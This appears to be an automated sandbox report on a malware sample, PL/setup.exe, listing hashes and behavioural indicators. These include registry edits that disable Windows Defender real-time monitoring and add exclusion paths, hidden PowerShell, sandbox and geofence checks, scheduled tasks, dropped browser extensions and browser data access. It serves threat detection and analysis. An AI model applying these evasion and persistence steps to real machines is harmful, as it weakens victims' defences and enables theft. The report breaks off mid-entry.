Overview
overview
10Static
static
10PL/6523.exe
windows7-x64
10PL/6523.exe
windows10-2004-x64
10PL/Galaxy.exe
windows10-2004-x64
7PL/Service.exe
windows7-x64
6PL/Service.exe
windows10-2004-x64
6PL/Une1.exe
windows10-2004-x64
7PL/pb1115.exe
windows7-x64
7PL/pb1115.exe
windows10-2004-x64
7PL/setup.exe
windows7-x64
10PL/setup.exe
windows10-2004-x64
10PL/setup.exe
windows7-x64
10PL/setup.exe
windows10-2004-x64
8PL/setup331.exe
windows7-x64
7PL/setup331.exe
windows10-2004-x64
7Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
10-11-2024 05:02
Behavioral task
behavioral1
Sample
PL/6523.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
PL/6523.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
PL/Galaxy.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
PL/Service.exe
Resource
win7-20240729-en
Behavioral task
behavioral5
Sample
PL/Service.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
PL/Une1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
PL/pb1115.exe
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
PL/pb1115.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
PL/setup.exe
Resource
win7-20241010-en
Behavioral task
behavioral10
Sample
PL/setup.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
PL/setup.exe
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
PL/setup.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
PL/setup331.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
PL/setup331.exe
Resource
win10v2004-20241007-en
General
-
Target
PL/setup.exe
-
Size
7.3MB
-
MD5
8b036a5a7406f7227ac65f44e1827fca
-
SHA1
3a8499ecca8be3f69cc7163b03f3f499bbe8276f
-
SHA256
85250ca9f679cdfebe009b7d66e409b330b35d6021e84e2ef7ceb0d64acdeff1
-
SHA512
91cecf5c22bd32fe5cead41884773933b49791e57e00a369818d716dea34433bb558e9feb5b2dfc37f2b4b3488c05dcc50ef1b0f267936c2945308f2e9f32b5a
-
SSDEEP
196608:91OeU0YzI5dCR00/4+cmJ/Dwami5rf0RejcO2h4I:3OxOCClgwa70Rej2h4I
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 2996 powershell.EXE 1468 powershell.EXE 1780 powershell.EXE 2464 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\International\Geo\Nation EMVGmrK.exe -
Executes dropped EXE 4 IoCs
pid Process 2964 Install.exe 2180 Install.exe 824 vWebWLI.exe 1608 EMVGmrK.exe -
Indirect Command Execution 1 TTPs 2 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 3012 forfiles.exe 2876 forfiles.exe -
Loads dropped DLL 12 IoCs
pid Process 2748 setup.exe 2964 Install.exe 2964 Install.exe 2964 Install.exe 2964 Install.exe 2180 Install.exe 2180 Install.exe 2180 Install.exe 2264 rundll32.exe 2264 rundll32.exe 2264 rundll32.exe 2264 rundll32.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json EMVGmrK.exe -
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vWebWLI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA EMVGmrK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA EMVGmrK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 EMVGmrK.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol vWebWLI.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat EMVGmrK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 EMVGmrK.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol EMVGmrK.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini vWebWLI.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 EMVGmrK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 EMVGmrK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 EMVGmrK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 EMVGmrK.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja EMVGmrK.exe File created C:\Program Files (x86)\oWxSecJNU\rzgGdAH.xml EMVGmrK.exe File created C:\Program Files (x86)\YNUWFfCEdUiU2\wAkOdaJtnCYpI.dll EMVGmrK.exe File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\caaUEUk.xml EMVGmrK.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi EMVGmrK.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi EMVGmrK.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak EMVGmrK.exe File created C:\Program Files (x86)\YNUWFfCEdUiU2\ioOgwSz.xml EMVGmrK.exe File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\dQfGPhl.dll EMVGmrK.exe File created C:\Program Files (x86)\LsajhStaXkJRC\nLrhEQW.dll EMVGmrK.exe File created C:\Program Files (x86)\LsajhStaXkJRC\mbnEyUI.xml EMVGmrK.exe File created C:\Program Files (x86)\QpigBxJgKxUn\qLlRXkU.dll EMVGmrK.exe File created C:\Program Files (x86)\oWxSecJNU\AOatCp.dll EMVGmrK.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job schtasks.exe File created C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job schtasks.exe File created C:\Windows\Tasks\zeLHdclAQOoTZxj.job schtasks.exe File created C:\Windows\Tasks\dBpreMcpfXbehynYz.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs EMVGmrK.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad EMVGmrK.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98\WpadDetectedUrl EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f012f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98 EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ EMVGmrK.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 EMVGmrK.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" EMVGmrK.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98\WpadDecisionTime = a02ecf142e33db01 EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs EMVGmrK.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 EMVGmrK.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\WpadDecision = "0" EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates EMVGmrK.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\WpadDecisionReason = "1" EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates EMVGmrK.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f012f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 EMVGmrK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA EMVGmrK.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" EMVGmrK.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\WpadNetworkName = "Network 